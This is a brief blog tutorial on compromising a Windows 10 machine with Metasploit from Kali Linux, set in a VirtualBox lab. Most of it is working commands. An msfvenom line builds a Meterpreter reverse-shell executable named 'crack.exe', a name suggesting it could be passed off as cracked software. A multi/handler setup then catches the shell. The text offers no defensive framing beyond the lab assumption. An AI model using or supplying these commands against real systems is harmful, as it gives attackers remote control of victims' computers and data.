Exploiting Windows 10 (latest update) using metasploit (in KALI): Cyberator
Introduction:
The Metasploit Framework is the most commonly-used framework for hackers worldwide. It allows hackers to set up listeners that create a conducive environment (referred to as a Meterpreter) to manipulate compromised machines. In this article, we’ll look at how this framework within Kali Linux can be used to attack a Windows 10 machine.
This article assumes the installation of Kali Linux has been done and is reachable through a bridged connection from a Windows machine on Virtual-box.
Step 1:
- Open terminal in Kali and type the following command:
msfvenom -p windows/x64/meterpreter/reverse_tcp lport=8080 lhost=<your IP> -f exe > /root/Desktop/crack.exe
Step 2:
- Open terminal in Kali and type the following commands
msfdb init
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lport 8080
set lhost <your IP address>
exploit
Comments
Post a Comment